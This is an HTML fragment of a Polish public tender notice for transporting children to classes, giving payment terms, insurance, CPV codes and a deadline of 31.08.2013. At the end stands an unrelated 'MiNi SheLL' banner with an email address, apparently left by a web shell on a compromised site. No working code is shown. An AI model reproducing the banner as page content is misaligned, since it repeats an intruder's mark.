związanego z odwozem uczestników na zajęcia. Wykonawca zobowiązuje się w przypadku awarii pojazdu lub
innych nieprzewidzianych okoliczności zależnych od Wykonawcy, wykonać na własny koszt usługę zastępczą,
aby odwóz dzieci mógł odbyć się terminowo. Wykonawca w celu prawidłowego wykonania zamówienia
zobowiązany jest posiadać odpowiednie ubezpieczenie od następstw nieszczęśliwych wypadków. Płatność
odbywać się będzie miesięcznie na podstawie zaakceptowanej przez Zamawiającego faktury VAT. Podstawę
wystawienia faktury VAT stanowić będzie wykaz przejechanych kilometrów potwierdzonych przez Koordynatora
Projektu. Należność na wystawionej fakturze VAT, stanowić będzie iloczyn przejechanych kilometrów i ceny
jednostkowej za przejechanie 1 km. Płatność 30 dni od momentu dostarczenia faktury VAT Zamawiającemu.
Wykonawca w cenie ofertowej musi uwzględnić wszelkie koszty niezbędne do prawidłowego wykonania
przedmiotu zamówienia. Wykonawca jest zobowiązany wykonać zamówienie w terminie do 31.08.2013 r.
Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy stanowiącym załącznik
nr 6b do SIWZ...</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.17.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com